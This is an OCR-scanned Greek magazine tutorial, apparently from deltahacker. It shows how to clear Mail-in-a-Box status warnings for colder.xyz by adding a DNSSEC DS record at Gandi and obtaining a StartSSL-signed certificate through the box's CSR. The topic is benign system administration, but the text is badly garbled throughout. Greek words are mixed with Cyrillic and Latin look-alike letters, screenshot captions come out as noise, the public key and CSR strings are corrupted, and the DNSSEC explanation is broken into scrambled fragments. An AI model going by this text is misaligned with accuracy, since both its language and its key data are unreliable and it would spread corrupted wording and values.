Postmaster contact address exists as a mail alias. [postmaster@box colder xyz ~ administrator(àbox colder xyz] 
Domain is not blacklisted by dbl.spamhaus.org. 
The SSL certificate for this domain is currently self-signed. You will get a security warning when you check or send email and 
when visiting this domain in a web browser (for webmail or static site hosting). Use the SSL Certificates page in this control 
panel to install a signed SSL certificate. You may choose to leave the self-signed certificate in place and confirm the security 


exception, but check that the certificate fingerprint matches the following: 
show more 


colder.xyz 


Nameservers are set correctly at registrar. [ns1 box .colder xyz: ns2.box colder xyz] 


Domain's email is directed to this domain. [colder.xyz ~ 10 box colder xyz] 

Postmaster contact address exists as a mail alias. [postmaster@colder xyz ~ administratorg)box colder хуг] 

Domain is not blacklisted by dbl.spamhaus.org. 

Domain resolves to this box's IP address. [colder.xyz — 46.101.173.140] 

The SSL certificate for this domain is currently self-signed. Visitors to a website on this domain will get a security warning. If 
you are not serving a website on this domain, then it is safe to leave the self-signed certificate in place. Use the SSL 
Certificates page in this control panel to install a signed SSL certificate. 

This domain's DNSSEC DS record is not set. The DS record is optional. The DS record activates DNSSEC. To set a DS record, 


you must follow the instructions provided by your domain name registrar and provide to them this information: 
show more 


This is a Mail-in-a-Box. 


Στο κάτω µέρος της σελίδας µε τα αποτελέσµατα των ελέγχων, λοιπόν, διαπι- 
στώνουµε ότι αυτή τη στιγµή υπάρχουν ορισμένα θέματα. Συγκεκριµένα: 


* TO πιστοποιητικό SSL για το box.colder.xyz είναι self-signed και, πέρα από 
τις ενοχλητικές προειδοποιήσεις που παίρνουμε σε web browsers και mail 
clients, τα εξερχόµενα emails µας έχουν µεγαλύτερη πιθανότητα να KATA- 
λήγουν στα spam folders των παραληπτών (ο mailserver χρησιμοποιεί το 
πιστοποιητικό που χρησιμοποιεί και ο web server) 


* ανάλογες παρατηρήσεις ισχύουν καιγιατοπιστοποιητικό SSL γιατο colder. 
xyz (av στήσουμε static site oro VPS нє ro MiaB, οι επισκέπτες του θα παίρ- 
νουν ενοχλητικές προειδοποιήσεις περί self-signed πιστοποιητικού) 


* το(προαιρετικό) DNSSEC DS record δεν έχει τεθεί (θα εξηγήσουμε σε λίγο 
περί τίνος πρόκειται) 


Στο υπόλοιπο του παρόντος άρθρου κάνουμε όλες τις απαραίτητες ενέργειες 
για να επιληφθούµε των τριών αυτών θεμάτων. 
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Οιρυθµίσεις που αφορούν ото DNS χρειάζονται κάποιο xpóvo yta va διαδοθούν — KL O 
χρόνος αυτός είναι πιθανό va φτάσει τις 24 ὠρες. Ευτυχώς, στις περισσότερες των 
περιπτώσεων δεν χρειάζεται πάνω απὀ µισή copa. Όπως φαίνεται και στο screenshot 
o DNS server του MiaB ήδη λειτουργεί σωστά, οπότε av από κάποιο алло μηχάνημα 
κάνουμε ping στα box.colder.xyz και colder.xyz παίρνουμε απαντήσεις. 


DNS Security Extensions 


Όταν σχεδιάστηκε για πρὠτη φορά ro DNS ra προβλήµατα ασφαλείας που έχου- 


µε σήµερα δεν φαίνονταν καν στον орі 
(ас, T.X., για την αποτροπή του spoofing. Ένα 


δεν ενσωμάτωνε μηχανισμούς ασφαλε 


οποιοδήποτε µηχάνηµαπου απηύθυνε к 


ση την πρὠτη που ελάμβανε, χωρίς να 


ἐστειλε. Σήμεραπου οι εἰ 


πιθέσεις phish 


ζοντα. Έτσι, για λόγους ταχύτητας το DNS 


άποιο ερώτημα δεχόταν ως έγκυρη απάντη- 
ελέγχει για το ποιος εἶναι εκείνος που την 
ing αποτελούν ψωμοτύρι ακόµη και γιατους 


blackhats µε μηδενική εμπειρία, η κατάσταση απὀ πλευράς ασφαλείας εἶναι αρκετά 
βελτιωμένη. Εξακολουθεί ωστόσονα € 
σεις, ερωτήματα προς DNS servers λαμ 
рата. Το λεγόμενο DNSSEC έχει σχεδιαστεί WOTE: 


(vat δυνατό ro DNS spoofing: Υπό προῦποθέ- 


βάνουν απαντήσεις από κακόβουλα μηχανή- 


* να ελέγχεται αν µια απάντηση που μόλις ελήφθη πράγματι εστάλη από τον 
nameserver που έπρεπε va τη στεί 


λει 


* ναελέγχεται αν o nameserver поо μόλις απάντησε εἰναι πράγματι εκείνος που 
υποτίθεται ὁτι εἰναι. 


Χωρίς va σκοπεύουμε ναμπούμε σε λεπτομέρειες,θαπούμε μόνο оті ro DNSSEC Ва- 
σίζεται στην κρυπτογραφία δημοσίου κλειδιού. Παρόμοιες τεχνικές υλοποιούνται 
και σε πολλές άλλες περιπτώσεις και εφαρμογές, όπως, T.X., ora SSH passwordless 
logins (http://deltahacker.gr/actsubs-openssh-secure-passwordless-logins) και στην 
κρυπτογράφηση rou email (http://deltahacker.gr/howto-strongly-encrypt-email). 
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Σημειώνουμε ότι για να δουλέψει το DNSSEC πρέπει να το υποστηρίζει τόσο 
o resolver (εκείνος που ρωτάει) όσο και ο nameserver (εκείνος που απαντά). O 
nameserver που δημιουργεί το MiaB υποστηρίζει το DNSSEC, αλλά επιπρόσθετα 
χρειάζεται να υποστηρίζεται a) апо rov registrar και B) για το top-level domain που 
μας ενδιαφέρει. Το Gandi, o registrar που χρησιμοποιούμε στην παρουσίασή µας, urto- 
στηρίζει το DNSSEC. Πα το δε top-level domain του τομέα µας, δηλαδή για το "хуг" 
TOU 'colder.xyz", επίσης παρέχεται υποστήριξη DNSSEC. Συστήνεται ενθουσιωδώς, 
λοιπόν, να κάνουμε όλες τις απαραίτητες ενέργειες ώστε να ενεργοποιήσουµε TO 
συγκεκριµένο χαρακτηριστικό. 


Στα screenshots και τις περιγραφές που ακολουθούν μπορείτε να δείτε πώς εργαζό- 
μαστε όταν ο registrar µας εἶναι το Gandi. 


? This domain's DNSSEC DS record is not set. The DS record is optional. The DS record activates DNSSEC. To set a DS 
record, you must follow the instructions provided by your domain name registrar and provide to them this information 


Key Tag 62121 p 


Key Flags: KSK 
RSASHA1-NSEC3-SHA1 

Digest Type: 2 / SHA-256 

Digest: 38aa2d88b9ab86f624a72a1788dc84747771311df6c25199ce514ac00ecc42d6 

Public Key 


AwEAAb96TbokQm842dexxzqR9wocSrgeVArpAs sQbk1rHAKQS 7vrMmS43ak8IvVPluvV2SbgtEQS6UC28wWCNPz y 
760vBH69r2YJEs /r239EX8EPW24MT7ES4dxC8o0mCT2S4ZQ6M2L hVLHhZbxbtSr3ailll8sums4hUL-4-KokfBJTc 


jcrsUs6Ar1RmRpAQ8JAkAyRqcSMwSfTeDQs Ty31--A98neNXQRUHQpxXBos i Z2CXNsMOrPwNQRm7 17 hnn--TGeQXk 
OTxoD791PuhK1yK12Nk11xQy8kZpNkZJkOV56qHGTDPIVd1v8sKYR7IMSUY9SYz4JKrmcDboGg jV03s-QCXX«k-| 


Στο control panel rou MiaB, στο κάτω μέρος της σελίδας κι εκεί που υπάρχει η προειδο- 
ποίηση περί DNSSEC, κάνουμε ένα κλικ στο "show more". Σημειώνουμε κάπου τις τιμές 
των Key Flags και Algorithm (KSK και 7 αντίστοιχα). Επιλέγουµε ολόκληρο ro Public Key 
και το αντιγράφουµε προσωρινά σε κάποιο νέο αρχείο απλού κειμένου. 


Ада a record 


— y сес [2ο κοκ ' 
D л оптт [5 — RSASHAT-NSECS-SHAT E 


m Publickey — | AwEAAb96TbokQm842dexxzqR9wocSrgeVArpAssQbk!rHAKQS7vrMmS-| 
3ak8lWPluvV2SbgtEQSGUC28wCNPzy760vBH69r2YJEs/r239EXBEPW2.«M 
T7ESAdxCBoOmCT2S«ZQ6M2L nVLHhZbxbtSr3ailllBsums4hUL-« okfBJTcj 
crsUsGArlRmRpAQBJAkAyRqcSMwSfTeDQsTy31«A98neNXQRUHQpxXBo 
siZ2CXNsMOrPwNQRm7IZhnn*TGeQXkOTxoD79IPuhK1yK12NKk11xQy8k 
sn sn RE DM DUE 
κ. 


Πηγαίνουµμε oro Gandi και συνδεόµαστε στο λογαριασμό µας εκεί. Ακολουθούμε τη бї- 
αδρομή Services > Domains > colder.xyz > Manage DNSSEC. Εστιάζουµε την προσοχή 
μας στην περιοχή Add a record. Την παράμετρο Flags τη θέτουµε ίση προς "257 - KSK", 
για το Algorithm επιλέγουμε то "7 - RSASHAT-NSEC3-SHAT', ενώ στο πλαίσιο Public key 
μεταφέρουμε το κλειδί που προηγουμένως αντιγράψαµε σε αρχείο απλού κειμένου. 
Τέλος πατάμε στο κουμπάκι Add, κάτω δεξιά. 
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colder.xyz 
Ü 
V DNSSEC 'DS' record is set correctly at registrar. v^ 


V Nameservers are set correctly at registrar. [ns1.box.colder.xyz; ns2.box.colder.xyz] 

V Domain's email is directed to this domain. [colder.xyz — 10 box.colder.xyz] 

v Postmaster contact address exists as a mail alias. [postmaster(gcolder.xyz — administrator(box.colder.xyz] 
V Domain is not blacklisted by dbl.spamhaus.org. 


v Domain resolves to this box's IP address. [colder.xyz — 46.101.173.140] 


Όπως έχουµε ήδη αναφέρει, οι αλλαγές που αφορούν oro DNS θέλουν λίγο χρόνο 
για va διαδοθούν. Θα χρειαστεί va περιμένουμε και, στο μεταξύ, από ro control panel 
του MiaB έχουμε τη δυνατότητα va ελέγχουμε τι γίνεται δίνοντας System > Status 
Checks. Κάποια στιγµή, στην ενότητα colder.xyz θα δούµε το μήνυμα "DNSSEC 'DS' 
record is set correctly at registrar", που βεβαίως σηµαίνει πως όλα είναι µια χαρά. 


Έκδοση υπογεγραμµένου πιστοποιητικού SSL/TLS και εγκατάσταση 


Με λίγα κι απλά λόγια, ένα ψηφιακό πιστοποιητικό εἶναι απαραίτητο ώστε а) η επι- 
κοινωνία µας µε κάποιον απομακρυσμένο server να γίνεται κρυπτογραφηµένα και 
B) να είμαστε βέβαιοι ότι ο απομακρυσμένος server είναι αυτός που υποτίθεται ότι 
εἶναι κι όχι, T.X, κάποιο μηχάνημα που ελέγχει ένας κακόβουλος χρήστης. O web 
server του MiaB χρησιμοποιεί éva ψηφιακό πιστοποιητικό -- και то (Oto πιστοποιη- 
TLKÓ χρησιμοποιεί κι ο mailserver. Όμως το συγκεκριµένο πιστοποιητικό είναι self- 
signed, δηλαδή υπογεγραμμένο από τον ἰδιο του τον εαυτό κι όχι από κάποια τρίτη, 
ἐμπιστη Αρχή Πιστοποίησης (Certificate Authority). Π' αυτό κι όποτε συνδεόµαστε 
στο web panel ñ στο web mail rou MiaB, ο browser γκρινιάζει και προειδοποιεί και 
үпте τας χείρας του, αφού δεν µπορεί να εἰναι σίγουρος για την αυθεντικότητα 
TOU απομακρυσμένου μηχανήματος. Ειδικά στην περίπτωσή µας, το self-signed πι- 
στοποιητικό έχει Kat µια πολύ πιο σοβαρή συνέπεια: Άλλοι mailservers που βλέπουν 
TO self-signed πιστοποιητικό του δικού µας συνοφρυώνονται και δεν τον παίρνουν 
πολύ στα σοβαρά, γεγονός που σημαίνει ότι та mails µας είναι πολύ πιθανό να kara- 
λήγουν σε κάποιο SPAM/Junk folder. 


Οπωσδήποτε, λοιπόν, κάτι πρέπει να κάνουμε, WOTE o Mailserver µας να µην Bew- 
ρείται πολίτης δεύτερης κατηγορίας. H λύση εἶναι να αποκτήσουμε éva νέο, UTO- 
γεγραμμένο, πιστοποιητικό και να συνεχίσουμε μ' αυτό. Το Gandi παρέχει δωρεάν 
πιστοποιητικά για τα domains που ἔχουμε αγοράσει από εκεί, αλλά μόνο για τον 
πρώτο χρόνο. Επίσης, η StartCom παρέχει δωρεάν πιστοποιητικά για το domain κι 
éva subdomain, ra οποία ισχύουν για éva χρόνο και η ανανέωσή τους γίνεται δωρε- 
ау. 


To пис δημιουργούμε λογαριασμό στη StartCom -δεν χρησιμοποιούμε username/ 
password αλλά ένα προσωπικό πιστοποιητικό-- και TO πώς αποκτάµε δωρεάν UTO- 
γεγραμμένο πιστοποιητικό για τον server ή τους servers μας, τα δείχνουμε αναλυτι- 
ка στο πλαίσιο αυτού του άρθρου: http://deltahacker.gr/actsubs-1srv2clouds-p33. 
Σε πολύ λίγο θα παρακολουθήσουμε ξανά τη διαδικασία λήψης πιστοποιητικού апо 
τη StartCom, το οποίο στη συνέχεια θα δώσουμε στο MiaB ώστε va χρησιμοποιείται 
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апо τον web server καθώς κι από τον Mailserver. Αυτή τη φορά δεν θα ζητήσουμε από 
τη StartCom να παραγάγει ιδιωτικό κλειδί και πιστοποιητικό για εμάς. Αυτά ra δύο 
αρχεία έχουν ήδη δημιουργηθεί από то Мав. Θα στείλουμε όµως στη StartCom το 
λεγόμενο Certificate Signing Request (CSR), ώστε η Αρχή Πιστοποίησης va υπογρά- 
Ψει ψηφιακά το πιστοποιητικό που ήδη διαθέτουμε. Па τη συνέχεια υποθέτουμε ότι 
έχετε ήδη αποκτήσει προσωπικό πιστοποιητικό апо τη StartCom (κι αν δεν έχετε, 
δείτε εδω: http://deltahacker.gr/actsubs-1srv2clouds-p33). 


_Startcom Home [ΕΤΕΙ 52955 08 | δισ. wor [oe 
FAQ. | control Panel | 


Certificates 
Wizard —Ru 


Select Certificate Purpose 


Identity Card 


* Make sure you have already validated a domain name or email address before using this tool! Select the 
"Validations Wizard" for this task. Organization 
* Depending on your preferences and type of software, you need to have a prepared certificate request (CSR) ready 
for submission. 7] WoT Community 


Certificate Target: [web Server SSL/TLS Certificate - c і калтан 


" Email Validations 


— Domain Validations 


SSL/TLS web server certificates are mostly used by web servers to secure communication across a network and 
to prevent eavesdropping, tampering and message forgery. Additionally server certificates identify the operator 


ofthe server at various levels, which allows a relaying party (visitors) to gain verified information about the 
owners of the web site. This is essential for trading (e-business) on the Internet and provides a trust factor 
otherwise difficult to obtain. 


S/MIME Client 


SSL/TLS Server 


Αφού συνδεθούµε oro site της StartCom (https://www.startssl.com) µε τη βοήθεια 
του προσωπικού µας πιστοποιητικού, από τις τρεις καρτέλες πάνω αριστερά KÁ- 
VOULE κλικ στην Certificates Wizard. Στο Certificate Target, λίγο πιο κάτω, επιλέγουμε 
το Web Server SSL/TLS Certificate. Το υπογεγραμμένο πιστοποιητικό που θα έχουµε 
σε λίγο θα ΄ναι κατάλληλο για χρήση апо rov nginx, апо το Devecot κι από ro postfix. 
Πατάµε πάνω στο πράσινο κουμπάκι, ro Continue. 
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Certificates 
Wizard 


Generate Private Key 


Identity Card 
* if you created your own private key and certificate request (CSR), please skip this step. 

* Provide a password for your private key. (At least 10 characters, max. 32] Organization 

* Allowed are only letters and numbers, without spaces! 

* Write your password down somewhere securely. 

* Note that the SHA hash algorithm may not be supported with newer browsers and operating systems. 

Key Password: μίαν 

Confirm Password: 

Keysize: |2048 (Medium) |” 

Secure Hash Algorithm: |SHA2 (Default) τ Domain Validations 


—> zz xuma 


e, At this step a private key is generated for your certificate. A certificate can only be used with the corresponding 


private key. 


WoT Community 


Email Validations 


S/MIME Client 


^ єє rm € Sarwar a 


Σε προηγούμενο άρθρο είχαμε παραγάγει ένα ιδιωτικό κλειδί µέσα апо ro web 
panel της StartCom (http://deltahacker.gr/actsubs-1srv2clouds-p33). Αυτή τη φορά 
TO MiaB έχει ήδη δημιουργήσει ένα ιδιωτικό κλειδί, το αντίστοιχο πιστοποιητικό, 
καθώς και το λεγόμενο Certificate Signing Request (CSR). Πρόκειται για ένα αρχείο, 
τα περιεχόμενα του οποίου θα στείλουμε σε λίγο στη StartCom και µέσω αυτού θα 
πάρουμε το δημόσιο πιστοποιητικό µας υπογεγραμμένο κι ἑτοιμο για χρήση. To бє 
ιδιωτικό κλειδί είναι αποθηκευμένο oro box και, περιττό να σημειώσουμε, δεν πρέ- 
πει να φύγει από εκεί. Σε αυτό το στάδιο της διαδικασίας, λοιπόν, δεν ζητάμε την 
παραγωγή ιδιωτικού κλειδιού, οπότε κάνουμε ένα κλικ στο κουμπάκι Skip. 


€ 8 htpsu/bo=colderayz/admin е || Q. search че + #0 Ф ае = 


Install SSL Certificate 


There are many places where you can get a free or cheap SSL certificate. We recommend Namecheap's 59 certificate or StartSSL's free express lane 


Which domain are you getting an SSL certificate for? 


boxcolderxyz |» 


You will need to provide the SSL certificate provider this Certificate Signing Request (CSR); 


m 


The CSR is safe tn share It can απὶν he used in cnmhinatinn with a serrat кау stored nn this machine. 


Πίσω στο control panel rou MiaB, επιλέγουμε System > SSL Certificates. Στην ενότη- 
τα Certificate Status, oro πάνω µέρος της σελίδας, κάτω апо τη στήλη Domain ava- 
γράφονται та box.colder.xyz και colder.xyz. Κάνουμε éva κλικ στο μπλε κουμπί Install 
Certificate, στα δεξιά της γραμμής rou box.colder.xyz. Н σελίδα θα σκρολάρει λίγο, WOTE 
να ξεκινά µε την ενότητα Install SSL Certificate. Παρατηρήστε το πλαίσιο µε то CSR: 
Επιλέγουμεκιαντιγράφουµε ὀλοτοπεριεχόμενότου,π.χ.,στο Clipboard ή σε ένα αρχείο 
απλού κειµένου. 
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€ ё stancom Ltd. (start Commercial. Ш) https;/www.startssl.com € || А search w“  α Ωω ἃ о = 


StartSSL™ - The Swiss Officer's Knife of Digital Certificates δι РКІ 


Certificates 2 
Wizard 4 


Submit Certificate Request (CSR) 


Identity Card 


* Copy and paste the content from the certificate request into the textbox below. - 
* Make sure, that you do not alter the content and you did not add any spaces! e Organization 
* Always include the headers and footers of the CSR. 
* The CSR must have а SHA1 hash or better, MD5 hashes are not allowed. & WoT Community 
* The RSA key size must be 2048 bit or higher. = 


Digital Identity 


Email Validations 


po 

|VqqasmkzC3V/FYjgnYhP/xOIgAOCps+H0FNVamYpXaN4u4 XtDt+L4hkiOi4LmlvfG |= UEM 

[GAsXXvsb4tzOPCFbD4 Кра 88aBOn|3cgUFcxA N3tXIo--GYPE7s/gFDc XÉSIKr-Hi Tg Я Борынын 
B 


|fwg1FHp9aCNJR3XOMPODjbferKnTiShCOqDKoYB/scqlKnMIWwZ 68gQKvcSO0k- 7 
m S/MIME Client * 


Στο web panel της StartCom, αυτή τη στιγµή πρέπει va είµαστε στη σελίδα για την 
υποβολή του CSR. Στο σχετικό πλαίσιο μεταφέρουμε *ÓAo* το περιεχόμενο που μό- 
Лс αντιγράψαμµε oro clipboard ή σε κάποιο αρχείο απλού κειµένου. Патаре πάνω ото 
κουμπί Continue. 


€ й startCom ttd. (start Commercial... ML) | https://www.startssl.com € || Q, search че + 4 Ф ө =E 


Certificates n 
Wizard 1 


Certificate Request Received 


Identity Card 


* You submitted your certificate signing request successfully!. = 
° All content of the certificate signing request is ignored except its public key. e Organization 
* You may proceed to the next step now. 


G WoT Community 


Digital Identity 


= 
-— 


Email Validations 


Ф EAE A EAE E 


do Domain Validations 


Ειδοποιούµαστε үа rnv επιτυχή υποβολή του CSR καιπληροφορούμαστε Órt TO μόνο 
που λαμβάνεται υπόψη εἰναι το δημόσιο κλειδί. Γενικά, εκτός από το δημόσιο κλει- 
бї éva CSR περιλαμβάνει πληροφορίες όπως όνομα εταιρείας/οργανισμού, domain 
name, πόλη/περιοχή και χώρα. Για άλλη µια φορά πατάμε πάνω στο Continue. 
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@ StartSSL'" Certificates & Pu... х. 


4 а startcom a, (Start Commercial... M) https://www.startsskcom € || Q, search пв ++ * ае = 


Certificates 
Wizard 


* Select the top target domain name for your certificate. —— 
* Note: Only domain names which were validated within the last 30 days are eligible for selection. Organization 


Domain: [colderxyz |= P Б WoT Community 
n — - 

Ξ = ἃ Digital Identity 

Email Validations 


Domain Validations 


= 


S/MIME Client 


Add Domains 


Identity Card 


8 SSL/TLS Server 


Ф 


Κανονικά κάπου εδώ πληκτρολογούμε το domain yta ro οποίο θαεκδοθείτοπιστοποιητικό, 
όμως то буора rou (colder.xyz) εμπεριέχεται ήδη στο CSR. Ξανά κλικ στο Continue, λοιπόν. 


θὲ StartSSL" Certificates & Pu... х 


Є а startcom tta. (Start Commercial.. Ш) https://www.startssl.com € ||. search пе + #5 Ф 4 ө = 


Sede cm ee e : -- == =. 


Add Domains 


Identity Card 


* Yu must add one sub domain to this certificate. 

* The base domain colder.xyz will be included by default in the Alt Name section. Organization 

* Note: In order to add multiple domains and sub domains, your Identity must be at least Class 2 validated. Check 
your status at the "Identity Card". 


WoT Community 


|.colderxyz - Digital Identity 


Email Validations 


Domain Validations 


S/MIME Client 


Το πιστοποιητικό που πρόκειται να πάρουμε εἰναι έγκυρο για ro domain (colder.xyz) 
καθώς και για ένα µόνο subdomain (της µορφής κάτι.οοἰάε-χγΖ). Πληκτρολογούμε στη 
σχετική θυρίδα ro όνοµα rou subdomain, ro οποίο γιατην περίπτωσή µας είναι το "box" 
(χωρίς τα εισαγωγικά). 


Εγκατάσταση και βασική ρύθμιση Mail-in-a-Box 


fÑ StartSSL"" Certificates & Pu... X 


4€ | Q StartCom tta. (Start Commercial... M)  httpsi//www.startssl.com C || Q, Search | *6-2*u ἃ ае = 


Certificates 
Wizard 


Ready Processing Certificate 


Identity Card 


* We have gathered enough information in order to sign your certificate now. 

* The common name of this certificate wil be set to box.colder.xyz. Organization 

* The certificate will have the following host names supported: 
1.colder.xyz 7] WoT Community 
2. box.colder.xyz 

* Please click on Continue in order to process the certificate. 


Digital Identity 


Email Validations 


т 


Domain Validations 


Όλες οι πληροφορίες για τη δηµιουργία rou urtoyeypaupévou πιστοποιητικού έχουν 
συλλεχθεί. Πληροφορούμαστε ότι θα υποστηρίζει δύο hostnames — yta TNV περίπτω- 
σή µας ra colder.xyz και box.colder.xyz. 


@, StartSSL™ Certificates & Pu... x 


€ й startCom Ltd. (start Commercial... (L) https://www.startssl.com € || Q, search *69*u Ф чө = 


Start ῇ 


Additional Check Required! Identity Card 


Yu successfully finished the process for your certificate. However your certificate request has been marked for === 
approval by our personnel. Please wait for a mail notification from us within the next 3 hours (the most). We Organization. 
might contact you for further questions or issue the certificate within that time. Thank you for your 

understanding! 


WoT Community 


Digital Identity 


Email Validations 


m 


Domain Validations 


= 


To πιστοποιητικό µας αναμένει έγκριση από το προσωπικό της StartCom κι όταν είναι 
έτοιμο θα λάβουμε email επιβεβαίωσης (δείτε παρακάτω). Σημειώστε ότι η διαδι- 
κασία έγκρισης δεν εἰναι τόσο τετριμμένη όσο θα πίστευε κανείς. Για παράδειγµα, 
την πρώτη φορά που επιχειρήσαµε va εκδώσουµε πιστοποιητικό για το colder.xyz, то 
αίτημά µας απορρίφθηκε. Ρωτήσαμε το λόγο, µέσω email, και η απάντηση ήταν ότιθα 
πρέπει να περιμένουμε να περάσουν "τουλάχιστον: τρεις μέρες µετάτην αγορά του 
domain. Περιμέναμε λοιπόν να περάσουν Αακριβώσς3τρεις μέρες, προσπαθήσαµε και 
πάλι και όλα πήγαν кат' ευχήν. 
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з Ме m. в а. v 2 
Move 


Reply  Replvall Forward Delete 


Print Mark 


StartSSL Certificate issued, 02 Jun 2015 05:03 Message 1 of 5 
From StartCom CertMaster (Itzhak Daniel) «certmasterGstartcom.org» 2* 
To postmaster&Gcolder.xyz] 1* 
Reply-To  certmaster&startcom.org 17 
Date Today 17:03 
Priority Normal 
To Christos Varelas, 
This mail concerns the digital certificate you requested from the StartCom Certification Authority 
(http://www.startssl.com). Your certificate with serial number 1627759 has been signed and is available at the Control 


Panel: 


https://www.startssl.com/?app-i2 


Please login to your account and select from the Tool Box tab the section Retrieve Certificate. The pending certificate 
is marked with a green colored label. 


Thank you! 


StartCom Ltd. 
StartSSL* Certification Authority 


Αφού το πιστοποιητικό µας εγκριθεί, έρχεται ενημερωτικό email oro postmaster(à 
colder.xyz. Το MiaB έχει φροντίσει ώστε το postmaster@colder.xyz у αποτελεί alias 
προς το email του χρήστη/διαχειριστή που καθορίσαµε κατά την εγκατάσταση (για 
εμάς, το email αυτό ήταν το talk2us(gcolder.xyz). Προκειμένου να αποκτήσουμε πρό- 
σβαση στο web mail που παρέχει το MiaB (µέσω του Roundcube), апо έναν browser 
επισκεπτόµαστε τη διεύθυνση https://box.colder.xyz/mail και κάνουμε login πλη- 
κτρολογώντας τη διεύθυνση email του διαχειριστή (talk2us(Qcolder.xyz) καθώς και 
το αντίστοιχο password. 


Ф а StartCom Ltd. (Start Commercial... M)  https://www.startssl.com/?app=12 € || Q, search пе + 4 ΩΩ Ф 4 ө = 


StartSSL” - The Swiss Officer's Knife of Digital Certificates & РКІ 


The Toolb: 
== ё Identity Card - 
@ Help items Retrieve Certificate Name: Christos Varelas 
@ StartSSL'" Messages e Thi Address: 
is tool allows you to retrieve issued certificates including the ones 
Ej Add Credit Card | PayPal | Ticket! ср have been held back for additional checks. Zip, City: 
Зз About Smart Cards/eToken * Labels marked green have not been retrieved yet. zs cadis ecl 
* Submit Verification Code ° For client (S/MIME) and smart card logon certificates make sure you d „ 
@ StartCom CA Certificates use the same browser which was used to create the request. Phone: 


©у Decrypt Private Key 
* Key Bug Checker Certificate: [boxolder.xyz (Server - Class 1 - 2016-06-01) [τ] L. 
Class1: Φ Class2: x 


τὰ Retrieve Certificate 


[8 Create PKCS#12 (PFX) File m d 

li) Revocation Request = Class3: Ж Ev: x 
@ Check Email Account M - 

@ Check DNS of Domain e Organization + 


d" Set Open Identity Preferences 
J Logout G WoT Community * 


Με ένα κλικ oro σχετικό URL (https://www.startssl.com/?app-12) rou email που μόλις 
λάβαμε, μεταβαίνουμε στη σελίδα της StartCom από την οποία μπορούμε va κατεβά- 
σουµε το υπογεγραμμένο, δημόσιο πιστοποιητικό µας. Στο drop-down μενού µε όνοµα 
Certificate φροντίζουμε core να είναι επιλεγμένο ro box.colder.xyz (Server - Clan 1 -..) 
και µετά πατάμε στο κουμπί Continue. 
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fÑ StartSSL™ Certificates & Pu... X 


w“ *®*П1Ш0%-4 ө = 


Ф а StartCom Ltd. (Start Comme 


LU https://www.startssl.com/?app=12 е 


StartSSL" - The Swiss Officer's Knife of Digital Certificates δι РКІ 


ΕΓ " 


The Toolbox 


@ Identity Card - 
@ Help items Retrieve Certificate Name: Christos Varelas 
@ StartSSL'" Messages Address: 
ᾷ AM κηρί Paypal [Tiket] tumet have he corresponding private key or request pending in order to ые 
About Smart Cards/eToken * Make sure to backup the certificate including the private key to some 
$t Submit Verification Code meg. M ene У State, Country: Thessaloniki - СА 
@ StartCom CA Certificates Phone: 
X Decrypt Private Key 
9 Key Bug Checker Malidatione 
τὰ Retrieve Certificate Class 1: $ Сіаѕѕ 2: x 
[8 Create PKCS#12 (PFX) File ч 
li Revocation Request кезж EER κ 
@ Check Email Account 
θὲ Check DNS of Domain e Organization Ф 
d" Set Open Identity Preferences 
J Logout G WoT Community * 
Id Digital Identity +) [= 
e Email Validations * 
ld) ^ Domain Validations + 


Ld 


[2] S/MIME Client 


A SSL/TLS Server 


Το πιστοποιητικό εμφανίζεται εντός του πλαισίου ονόματι Certificate. Επιλέγουμε κι 
αντιγράφουµε "όλον το περιεχόµενο του πλαισίου. 


You will need to provide the SSL certificate provider this Certificate Signing Request (CSR): 


MIICazCCAVMCAQAw) jELMAkGA1UEBhMCRIIxFzAVBgNVBAMMDmJveC5 jb2xkZXIu 
eH1GMITIBIjANBgkqhkiG9wOBAQEFAAOCAQSAMIIBCgKCAQEAUYhYINs jAya4RSnZ 
ToewiXq5913/CToN3ObS1RAFS jAw*l/CtAKk7cp-oH426NwADETz j LZ YadMCn9BG 
/hAtdbuzMaegkS jhZX9Et jAlbNkcsGAgGZxRFB jSKRVyqJ/rSsnFUEewNEVi Fxm 
RBCxhQ7pk65vn2Hxt jAdVYn/zGgTNz;jl/9kSOYh jcYHoC9wR2v6UZ6/ ak27BLLQ9 
HqTRr8JRbPXXviige@3TS7nh6ec2wShnkpQcLXfiuXH7A1AKczVZnQJYFmXQyC7Zuu 
Cjl4agnoyxXDiim4YvVVzImvf2gV8/ytgsV7uq9/y98V10Ssw9xvx9BeErI6libmfva 
31Dj6wIDAQABOAAWDQYJKOZIhvcNAQELBQADggEBAARaYQf sBbnGxf 1kt4r-haIx 
0919jHxutt3Q/BHG70BKwTnnAySboCi TOh7ESeNF gIQ0rzcRHAEAXXVqv3707f2 
eNF3XaV3jzPQObszKo1T8ozDoCwbNCZ/--1-d6S7HkFL.jDZRR/bD4OpocbqVubilTu 
Vqq8mkzC3V/FYjgnYhP/xOIqA0Cps+H@FNVamYpXaN4u4XtDt+L4hki0i4LmlvfG 
GAsXXvsb4tz0PCFbD4kp488a80nJ3cgUFcx4N3tX1o+GYPE7s/gFDcXfSIKr+4Tg 
fSwglFHp9aCNJR3XOMPOD jbf8rKnT1ShCOqDKoYB/scqIKnMIWWZ6BgOKvcSOGk- L 


The CSR is safe to share. It can only be used in combination with a secret key stored on this machine. 
The SSL certificate provider will then provide you with an SSL certificate. They may also provide you with an intermediate chain. Paste each separately into the boxes below: 


SSL certificate: 


eEaDURKfamT35DbKHBm4UvGj7 HXQBWI/sf* HuzT2fVbubg9qoiqfAZbGDIrjGNqv 
ET4vwau3s5Xb7B4wE9TqjOAVO1z9RHplg3oho9Bzdt15MaCcC5NLVYkOjZcsog3i 


m2sXTtyfH9dsBgL GZ0Q/Hr305MpseJZEBYo5SfZsBOyXq81kaSoTHOXDHwXdOx3UI 
d4HOTZjbD9b84e2aoARG 
——END ΟΕΒΤΙΕΙΟΑΤΕ----- 


m 


SSL intermediate chain (if provided). 


ВЕС! 


Στο control panel тоо MiaB, αντιγράφουμε το πιστοποιητικό εντός του πλαισίου µε óvo- 
μα SSL certificate. Δεν πατάμε ακόµα στο κουμπί Install, µιας και χρειαζόμαστε το ενδι- 
άµεσο πιστοποιητικό της StartCom. Σημειωτέον πως το πιστοποιητικό που μόλις λά- 
Baue δεν έχει υπογραφεί από ro λεγόμενο root certificate της StartCom. Αντίθετα, έχει 
υπογραφεί µε το ενδιάμεσο πιστοποιητικό που θα κατεβάσουµε (κι αυτό έχει όντως 
υπογραφεί апо ro root certificate). 
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fÑ StartSSL™ Certificates & Pu... κ 
€ а startcom ltd. (Start Commercial... M) Περ startssl.com/?app=12 C || Q search wë 4 ΠΩ ἃ 49 


StartSSL'" - The Swiss Officer's Knife of Digital Certificates δι РКІ 


== sa usss © 
The Toolb: 
